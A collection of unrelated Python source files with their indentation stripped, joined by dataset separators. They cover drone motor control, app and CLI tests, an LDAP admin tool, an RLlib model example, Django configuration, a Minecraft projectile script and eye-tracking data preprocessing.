THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from pyb import Pin, Timer
import utils.airpy_logger as logger
import array
class EscController:
def __init__(self, config_m, pwm_rate):
# ESC parameters
self.esc_pwm_min_cmd = config_m.get_param_set('esc', 'esc_pwm_min_cmd')
self.esc_pwm_center = config_m.get_param_set('esc', 'esc_pwm_center')
self.esc_pwm_min = config_m.get_param_set('esc', 'esc_pwm_min')
self.esc_pwm_max = config_m.get_param_set('esc', 'esc_pwm_max')
self.esc_low_range = self.esc_pwm_center - self.esc_pwm_min
self.esc_high_range = self.esc_pwm_max - self.esc_pwm_center
self.esc_full_range = self.esc_pwm_max - self.esc_pwm_min
self.tmp_pwm = None
# Threshold at 10% for the PID start working
self.esc_pid_threshold = int(0.1*(self.esc_pwm_max - self.esc_pwm_min)) + self.esc_pwm_min
# PWM initialization TODO: hexacopter handling
self._num_motors = config_m.get_param('num_motors')
self.pulse_widths = array.array('H', [0, 0, 0, 0]) # TODO: initialize based on # of motors
# TODO: GENERALIZE
# set PWM to 400Hz TODO: set freq according to settings
self._timers = [Timer(config_m.get_param_set('esc', 'quadcopter')['timers'][index],
prescaler=83, period=2499) for index in range(0, self._num_motors)]
self._escs = [self._timers[index].channel(config_m.get_param_set('esc',
'quadcopter')['channels'][index],
Timer.PWM,
pin=Pin(config_m.get_param_set('esc',
'quadcopter')['pins'][index]
)
) for index in range(0, self._num_motors)]
logger.info("Esc Controller Started")
def set_thrust_passthrough(self, pwm):
for j in range(0, self._num_motors):
self._escs[j].pulse_width(pwm)
def set_zero_thrust(self):
# set the thrust of all the motors to 0. Used for esc setup
self.pulse_widths = [self.esc_pwm_min_cmd for i in range(0, self._num_motors)] # used for aplink report
for j in range(0, self._num_motors):
self._escs[j].pulse_width(self.esc_pwm_min_cmd)
def set_thrust(self, widths):
self.pulse_widths = [min(max(self.esc_pwm_min, widths[0] - widths[1] - widths[2] - widths[3]), self.esc_pwm_max),
min(max(self.esc_pwm_min, widths[0] + widths[1] + widths[2] - widths[3]), self.esc_pwm_max),
min(max(self.esc_pwm_min, widths[0] - widths[1] + widths[2] + widths[3]), self.esc_pwm_max),
min(max(self.esc_pwm_min, widths[0] + widths[1] - widths[2] + widths[3]), self.esc_pwm_max)]
for k in range(0, self._num_motors):
self._escs[k].pulse_width(self.pulse_widths[k])
|
StarcoderdataPython
|
4830297
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from marionette.by import By
from gaiatest import GaiaTestCase
from gaiatest.apps.homescreen.app import Homescreen
MANIFEST = 'http://mozqa.com/data/webapps/mozqa.com/manifest.webapp'
APP_NAME = 'Mozilla QA WebRT Tester'
TITLE = 'Index of /data'
class TestLaunchApp(GaiaTestCase):
_confirm_install_button_locator = (By.ID, 'app-install-install-button')
_header_locator = (By.CSS_SELECTOR, 'h1')
def setUp(self):
GaiaTestCase.setUp(self)
self.connect_to_network()
self.homescreen = Homescreen(self.marionette)
self.homescreen.launch()
# Install app
self.marionette.switch_to_frame()
self.marionette.execute_script(
'navigator.mozApps.install("%s")' % MANIFEST)
# Confirm the installation and wait for the app icon to be present
self.wait_for_element_displayed(*self._confirm_install_button_locator)
self.marionette.find_element(*self._confirm_install_button_locator).tap()
self.homescreen.switch_to_homescreen_frame()
self.homescreen.wait_for_app_icon_present(APP_NAME)
def test_launch_app(self):
# Verify that the app icon is visible on one of the homescreen pages
self.assertTrue(self.homescreen.is_app_installed(APP_NAME),
"App %s not found on Homescreen" % APP_NAME)
# Click icon and wait for h1 element displayed
self.homescreen.installed_app(APP_NAME).tap_icon()
self.wait_for_element_displayed(*self._header_locator, timeout=20)
self.assertEqual(self.marionette.find_element(*self._header_locator).text, TITLE)
def tearDown(self):
self.apps.uninstall(APP_NAME)
GaiaTestCase.tearDown(self)
|
StarcoderdataPython
|
150464
|
#!/usr/bin/env python3
import sys
import click
import check_entry_mariadb
import delete_old_entries
import detect_ldap_problems
import fix_wrong_format
import update_password_fields
import delete_userpassword_cram
from config_loader import load_config
from common import LOGGER
@click.group()
def cli():
"""CLI for submit lock accounts """
pass
@cli.command()
@click.argument('input_file')
@click.option('--limit_days_ago', default=None)
@click.option('--number_of_accounts', default=None)
def delete_submit_locks(input_file, limit_days_ago, number_of_accounts):
"""Delete entries in ldap older than limit_days_ago before today
:param input_file: File generated by check_submit_locks
:param limit_days_ago: Date limit in days before current date to delete lock = submit
:param number_of_accounts: Number of accounts to delete lock = submit
"""
delete_old_entries.delete_old_entries(input_file, number_of_accounts=number_of_accounts,
limit_days_ago=limit_days_ago)
@cli.command()
@click.argument('input_file')
@click.argument('pattern')
def detect_wrong_format(input_file, pattern):
"""Delete entries in ldap older than limit_days_ago before today
:param input_file: Ldap dumb file to parse
:param pattern: Pattern to be detected, it must be defined in config.yml!
"""
cfg = load_config()
try:
cfg[pattern]
except KeyError:
LOGGER.error("Pattern not found in the config.yml file!")
sys.exit(1)
else:
detect_ldap_problems.detect_wrong_format(cfg[pattern], input_file)
@cli.command()
@click.argument('input_file')
def delete_user_password_cram(input_file):
"""Delete userpasswordcram in ldap
:param input_file: Ldap dumb file to parse
"""
delete_userpassword_cram.delete_userpassword_cram(input_file)
@cli.command()
@click.argument('input_file')
@click.option('--number_of_accounts', default=10)
def fix_wrong_format(input_file, number_of_accounts):
"""Delete entries in ldap older than limit_days_ago before today
:param input_file: File with the broken accounts ()
:param number_of_accounts: Number of accounts to fix
"""
fix_wrong_format.fix_wrong_format(input_file, number_of_accounts=number_of_accounts)
@cli.command()
@click.argument('input_file')
@click.option('--number_of_accounts', default=None)
@click.option('--first_account', default=0)
def update_password_fields(input_file, number_of_accounts, first_account):
"""Updates password fields in ldap using requests to PMAPI
:param input_file: Ldap dumb file to parse
:param number_of_accounts: Number of accounts to update
:param first_account: First account in the dump file to start updating
"""
update_password_fields.update(input_file, number_of_accounts=number_of_accounts,
first_account=first_account)
if __name__ == '__main__':
cli()
|
StarcoderdataPython
|
85964
|
<reponame>Cray-HPE/hms-capmc<filename>test/python/test_getXnameStatusByCLIBad.py
#!/usr/bin/python3
# MIT License
#
# (C) Copyright [2019-2021] Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
Test case for getXnameStatusByCLIBad
"""
from subprocess import Popen, PIPE
from shlex import split
from sys import exit
from re import search
################################################################################
#
# getXnameStatusByCLIBad
#
################################################################################
def getXnameStatusByCLIBad():
TEST = "getNodeStatusByCLIBad"
xnames = "x99999c9s9b0n9"
CMD = "cray capmc get_xname_status create --xnames "+xnames
print("["+TEST+"] Checks the status of invalid xname: "+CMD)
process = Popen(split(CMD), stdout=PIPE, stderr=PIPE)
process.wait()
_, stderr = process.communicate()
if process.returncode != 0:
errstr = stderr.decode("utf-8")
if search("400 Client Error", errstr):
print("["+TEST+"] PASS: Received expected 400 Client Error.")
return 0
print("["+TEST+"] FAIL: "+errstr+", expected 400 Client Error.")
return 1
print("["+TEST+"] FAIL: No error, expected 400 Client Error")
return 1
def test_getXnameStatusByCLIBad():
assert getXnameStatusByCLIBad() == 0
if __name__ == "__main__":
ret = getXnameStatusByCLIBad()
exit(ret)
|
StarcoderdataPython
|
3223272
|
"""Example of using a custom model with batch norm."""
import argparse
import ray
from ray import tune
from ray.rllib.models import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.utils import try_import_tf
from ray.rllib.utils.annotations import override
tf = try_import_tf()
parser = argparse.ArgumentParser()
parser.add_argument("--num-iters", type=int, default=200)
parser.add_argument("--run", type=str, default="PPO")
class BatchNormModel(TFModelV2):
"""Example of a TFModelV2 that is built w/o using tf.keras.
NOTE: This example does not work when using a keras-based TFModelV2 due
to a bug in keras related to missing values for input placeholders, even
though these input values have been provided in a forward pass through the
actual keras Model.
All Model logic (layers) is defined in the `forward` method (incl.
the batch_normalization layers). Also, all variables are registered
(only once) at the end of `forward`, so an optimizer knows which tensors
to train on. A standard `value_function` override is used.
"""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
# Have we registered our vars yet (see `forward`)?
self._registered = False
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
last_layer = input_dict["obs"]
hiddens = [256, 256]
with tf.variable_scope("model", reuse=tf.AUTO_REUSE):
for i, size in enumerate(hiddens):
last_layer = tf.layers.dense(
last_layer,
size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name="fc{}".format(i))
# Add a batch norm layer
last_layer = tf.layers.batch_normalization(
last_layer,
training=input_dict["is_training"],
name="bn_{}".format(i))
output = tf.layers.dense(
last_layer,
self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="out")
self._value_out = tf.layers.dense(
last_layer,
1,
kernel_initializer=normc_initializer(1.0),
activation=None,
name="vf")
if not self._registered:
self.register_variables(
tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
self._registered = True
return output, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
"""Keras version of above BatchNormModel with exactly the same structure.
IMORTANT NOTE: This model will not work with PPO due to a bug in keras
that surfaces when having more than one input placeholder (here: `inputs`
and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
PPO), in which auto-placeholders are generated, then passed through the
tf.keras. models.Model. In this last step, the connection between 1) the
provided value in the auto-placeholder and 2) the keras `is_training`
Input is broken and keras complains.
Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
"""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
is_training = tf.keras.layers.Input(
shape=(), dtype=tf.bool, batch_size=1, name="is_training")
last_layer = inputs
hiddens = [256, 256]
for i, size in enumerate(hiddens):
label = "fc{}".format(i)
last_layer = tf.keras.layers.Dense(
units=size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name=label)(last_layer)
# Add a batch norm layer
last_layer = tf.keras.layers.BatchNormalization()(
last_layer, training=is_training[0])
output = tf.keras.layers.Dense(
units=self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="fc_out")(last_layer)
value_out = tf.keras.layers.Dense(
units=1,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="value_out")(last_layer)
self.base_model = tf.keras.models.Model(
inputs=[inputs, is_training], outputs=[output, value_out])
self.register_variables(self.base_model.variables)
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
out, self._value_out = self.base_model(
[input_dict["obs"], input_dict["is_training"]])
return out, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
if __name__ == "__main__":
args = parser.parse_args()
ray.init()
ModelCatalog.register_custom_model("bn_model", BatchNormModel)
config = {
"env": "Pendulum-v0" if args.run == "DDPG" else "CartPole-v0",
"model": {
"custom_model": "bn_model",
},
"num_workers": 0,
}
tune.run(
args.run,
stop={"training_iteration": args.num_iters},
config=config,
)
|
StarcoderdataPython
|
1729790
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-07-19 01:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webapp', '0002_auto_20160719_0131'),
]
operations = [
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('conference', models.CharField(choices=[('EC', 'EASTERN'), ('WC', 'WESTERN')], default='EC', max_length=2, verbose_name='Conference')),
('name', models.CharField(max_length=64, verbose_name='Name')),
('arena', models.CharField(max_length=64, verbose_name='Arena')),
('foundation', models.DateField(verbose_name='Foundation')),
('about_history', models.TextField(verbose_name='About/History')),
],
options={
'verbose_name': 'Team',
'verbose_name_plural': 'Teams',
},
),
]
|
StarcoderdataPython
|
3312863
|
#
# Code by <NAME> and under the MIT license
#
#
# python grenade.py [speed [gravity]]
#
# Throws a grenade with the specified speed in m/s (default: 15) and specified
# gravitational acceleration (default: earth) in m/s^2 or given by listing a planet,
# sun, moon or pluto.
#
from mine import *
from vehicle import *
import time
import sys
GRAVITIES = {
'sun':274,
'mercury':3.59,
'venus':8.87,
'earth':9.81,
'moon':1.62,
'mars':3.77,
'jupiter':25.95,
'saturn':11.08,
'uranus':10.67,
'neptune':14.07,
'pluto':0.42
}
def getPath(center, azi, alt, v0):
vx = v0 * cos(alt) * sin(-azi)
vy = v0 * sin(alt)
vz = v0 * cos(alt) * cos(-azi)
t = 0
x = center.x + cos(alt) * sin(-azi) * 2
y = center.y + sin(alt) * 2 + 2
z = center.z + cos(alt) * cos(-azi) * 2
path = [(t,Vec3(round(x),round(y),round(z)))]
while not mc.getBlock(x,y,z):
v = sqrt(vx*vx+vy*vy+vz*vz)
if v < 1:
dt = 0.5
else:
dt = 0.5/v
v1x = vx
v1y = vy - g * dt
v1z = vz
x += (vx+v1x)/2 * dt
y += (vy+v1y)/2 * dt
z += (vz+v1z)/2 * dt
vx = v1x
vy = v1y
vz = v1z
t += dt
path.append( ( t,Vec3(round(x),round(y),round(z)) ) )
return path
def getXYZ(path, t1):
for t,xyz in path:
if t1<=t:
return xyz
return path[-1][1]
mc = Minecraft()
try:
v0 = int(sys.argv[1])
except:
v0 = 15
if 3 <= len(sys.argv):
try:
g = float(sys.argv[2])
except:
g = GRAVITIES[sys.argv[2].lower()]
else:
g = GRAVITIES['earth']
center = mc.player.getPos()
azi = mc.player.getRotation() * pi/180.
alt = -mc.player.getPitch() * pi/180.
GRENADE = { (-1,0,0):block.TNT, (1,0,0):block.TNT, (0,-1,0):block.TNT, (0,1,0):block.TNT, (0,0,1):block.TNT, (0,0,-1):block.TNT }
grenade = Vehicle(mc, False)
grenade.setVehicle(GRENADE)
path = getPath(center, azi, alt, v0)
dictionary = {}
prev = path[0][1]
grenade.draw(prev.x,prev.y,prev.z)
t0 = time.time()
while True:
t = time.time() - t0
pos = getXYZ(path,t)
grenade.moveTo(pos.x,pos.y,pos.z)
prev=pos
time.sleep(0.1)
if t > path[-1][0]:
break
mc.setBlock(path[-1][1],block.FIRE)
|
StarcoderdataPython
|
1713003
|
from PyQt4 import QtGui
import sys
from views import base
class ExampleApp(QtGui.QMainWindow, base.Ui_MainWindow):
def __init__(self, parent=None):
super(ExampleApp, self).__init__(parent)
self.setupUi(self)
def main():
app = QtGui.QApplication(sys.argv)
form = ExampleApp()
form.show()
app.exec_()
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1640440
|
from django.test import SimpleTestCase
from cpu.random import Random
from game.transforms import Board
def sample_input():
return [
'x', 'x', ' ',
'o', ' ', ' ',
'o', ' ', 'x',
]
class RandomAiTest(SimpleTestCase):
def test_picks_random(self):
data = sample_input()
ai = Random()
move = ai.play(Board(data), 'x', 'o')
self.assertEquals(data[move], ' ')
def test_get_name(self):
ai = Random()
self.assertRegex(ai.name().upper(), '.*RANDOM.*')
|
StarcoderdataPython
|
3382818
|
"""example URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.contrib.auth import views as auth_views
from .views import (ExampleJobLogView, ExampleJobStatusView, IndexView,
JobDetail, JobList, ServerDetail, ServerList)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', IndexView.as_view(), name='index'),
# Login
url(r'^accounts/login/$', auth_views.login, {'template_name': 'login.html'}, name='login'),
url(r'^logout/$', auth_views.logout, {'template_name': 'logged_out.html'}, name='logout'),
# Live job status
url(r'^example/$', ExampleJobStatusView.as_view(), name='example'),
url(r'^logs/(?P<job_pk>[0-9]+)/$', ExampleJobLogView.as_view(), name='logs'),
url(r'^servers/$', ServerList.as_view(), name='server-list'),
url(r'^servers/(?P<pk>[0-9]+)/$', ServerDetail.as_view(), name='server-detail'),
url(r'^jobs/$', JobList.as_view(), name='job-list'),
url(r'^api/', include('django_remote_submission.urls')),
]
# Serving files uploaded by a user during development
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
StarcoderdataPython
|
4809366
|
#!/usr/bin/env python
# encoding: utf-8
"""
first_level_control.py
If used, please cite:
<NAME>., <NAME>., <NAME>. & <NAME>.
Task-evoked pupil responses reflect internal belief states. Scientific Reports 8, 13702 (2018).
"""
import os, sys, datetime
import subprocess, logging
import scipy as sp
import scipy.stats as stats
import numpy as np
import matplotlib.pylab as pl
from IPython import embed as shell
this_raw_folder = '/home/raw/'
this_project_folder = '/home/control'
analysisFolder = os.path.join(this_project_folder, 'analysis')
sys.path.append( analysisFolder )
sys.path.append( os.environ['ANALYSIS_HOME'] )
from Tools.Sessions import *
from Tools.Run import *
import pupil_data_analysis_control
# -----------------
# Comments: -
# -----------------
subjects = ['sub-16','sub-17','sub-18','sub-19','sub-20','sub-21','sub-05','sub-22','sub-23','sub-24','sub-09','sub-25','sub-26','sub-27','sub-28']
for which_subject in subjects:
sessions = [1]
edfs = []
for s in sessions:
def runWholeSession( rDA, session ):
for r in rDA:
thisRun = Run( **r )
presentSession.addRun(thisRun)
session.parcelateConditions()
session.parallelize = True
# initialize pupil session:
global edfs
edfs.append( [rDA[i]['eyeLinkFilePath'] for i in range(len(rDA)) if rDA[i]['condition'] == 'task'] )
if s == 1:
edfs = list(np.concatenate(edfs))
aliases = []
for i in range(len(edfs)):
session = int(edfs[i].split('_s')[1][0])
aliases.append('feedback_{}_{}'.format(i+1, session))
print aliases
subject = Subject(which_subject, '?', None, None, None)
experiment = 1
version = 2
## preprocessing:
pupilPreprocessSession = pupil_data_analysis_control.pupilPreprocessSession(subject=subject, experiment_name='pupil_feedback', experiment_nr=experiment, version=version, sample_rate_new=50, project_directory=this_project_folder)
pupilPreprocessSession.import_raw_data(edf_files=edfs, aliases=aliases)
pupilPreprocessSession.convert_edfs(aliases)
## pupilPreprocessSession.delete_hdf5() # run if need to redo HDF5 files
pupilPreprocessSession.import_all_data(aliases)
for alias in aliases:
pupilPreprocessSession.process_runs(alias, artifact_rejection='not_strict', create_pupil_BOLD_regressor=False)
pass
pupilPreprocessSession.process_across_runs(aliases, create_pupil_BOLD_regressor=False)
# for testing;
if __name__ == '__main__':
####################################################################################################################################################################################
if which_subject == 'sub-16':
# subject information
initials = 'sub-16'
firstName = 'sub-16'
standardFSID = 'sub-16_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 21)
sj_session1 = 'sub-16_210617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-17':
# subject information
initials = 'sub-17'
firstName = 'sub-17'
standardFSID = 'sub-17_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 29)
sj_session1 = 'sub-17_290617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
####################################################################################################################################################################################
if which_subject == 'sub-18':
# subject information
initials = 'sub-18'
firstName = 'sub-18'
standardFSID = 'sub-18_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 8, 23)
sj_session1 = 'sub-18_230817'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-19':
# subject information
initials = 'sub-19'
firstName = 'sub-19'
standardFSID = 'sub-19_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-19_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r5.edf' ),
},
